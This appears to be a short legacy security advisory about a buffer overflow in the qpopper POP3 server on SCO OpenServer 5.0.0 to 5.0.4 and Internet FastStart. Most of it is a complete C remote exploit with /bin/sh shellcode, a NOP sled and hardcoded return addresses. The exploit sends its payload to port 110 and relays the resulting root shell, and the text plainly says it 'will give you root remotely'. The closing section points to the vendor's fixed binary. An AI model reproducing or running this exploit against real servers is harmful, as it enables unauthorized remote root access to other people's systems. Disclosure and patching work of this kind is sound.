COMMAND
popper
SYSTEMS AFFECTED
SCO OpenServer 5.0.0 through 5.0.4, SCO Internet FastStart 1.0.0 and 1.1.0
PROBLEM
A buffer overflow vulnerability that has been identified QUALCOMM
qpopper seems to be present in servers based on QUALCOMM's qpopper
such as SCO.
Vit Andrusevich made an exploit whoch will give you root remotely.
Offset 0 is for version 2.1.4-R3. ASM string was little modified
for SCO syscall style. Tested on SCO Open Server 5.0.4.
/*
* Remote pop exploit for SCO systems.
* by glitch of litecrew.
* Ripped from Miroslaw Grzybek's code.
*/
#include <stdio.h>
#include <stdlib.h>
#include <sys/time.h>
#include <sys/types.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/errno.h>
char *shell=
"\xeb\x32\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x12\x89\x5e\x17"
"\x88\x5e\x1c\x8d\x16\x89\x56\x0e\x31\xc0\xb0\x3b\x8d\x7e"
"\x12\x89\xf9\x89\xf9\xbf\x10\x10\x10\x10\x29\x7e\xf5\x89"
"\xcf\xeb\x01\xff\x63\x61\x62\x62\xeb\x1b\xe8\xc9\xff\xff"
"\xff/bin/sh\xaa\xaa\xaa\xaa\xff\xff\xff\xbb\xbb\xbb\xbb"
"\xcc\xcc\xcc\xcc\x9a\xaa\xaa\xaa\xaa\x07\xaa";
#define ADDR 0x80474b4
#define OFFSET 0
#define BUFLEN 1200
char buf[BUFLEN];
int offset=OFFSET;
int nbytes;
int sock;
struct sockaddr_in sa;
struct hostent *hp;
short a;
void main (int argc, char *argv[]) {
int i;
if(argc<2) {
printf("Usage: %s <IP | HOSTNAME> [offset]\n",argv[0]);
printf("Default offset is 0. It works against SCOPOP v2.1.4-R3\n");
exit(0);
}
if(argc>2)
offset=atoi(argv[2]);
memset(buf,0x90,BUFLEN);
memcpy(buf+800,shell,strlen(shell));
for(i=901;i<BUFLEN-4;i+=4)
*(int *)&buf[i]=ADDR+offset;
buf[BUFLEN]='\n';
if((hp=(struct hostent *)gethostbyname(argv[1]))==NULL) {
perror("gethostbyname()");
exit(0);
}
if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))<0) {
perror("socket()");
exit(0);
}
sa.sin_family=AF_INET;
sa.sin_port=htons(110);
memcpy((char *)&sa.sin_addr,(char *)hp->h_addr,hp->h_length);
if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))!=0) {
perror("connect()");
exit(0);
}
printf("CONNECTED TO %s... SENDING DATA\n",argv[1]);
fflush(stdout);
write(sock,buf,strlen(buf));
while(1) {
fd_set input;
FD_SET(0,&input);
FD_SET(sock,&input);
if((select(sock+1,&input,NULL,NULL,NULL))<0) {
if(errno==EINTR) continue;
printf("CONNECTION CLOSED...\n");
fflush(stdout);
exit(1);
}
if(FD_ISSET(sock,&input)) {
nbytes=read(sock,buf,BUFLEN);
for(i=0;i<nbytes;i++) {
*(char *)&a=buf[i];
if ((a!=10)&&((a >126) || (a<32)) ){
buf[i]=' ';
}
}
write(1,buf,nbytes);
}
if(FD_ISSET(0,&input))
write(sock,buf,read(0,buf,BUFLEN));
}
}
SOLUTION
A fixed binary is now available in the SCO Security Enhancements
directory on ftp.sco.com:
ftp://ftp.sco.com/SSE
The popper fix applies to SCO OpenServer 5.0.0 through 5.0.4, SCO
Internet FastStart 1.0.0 and 1.1.0. The popper in UnixWare 7 and
in UnixWare 2.x-based Internet FastStart is based on completely
different source and doesn't have this set of problems.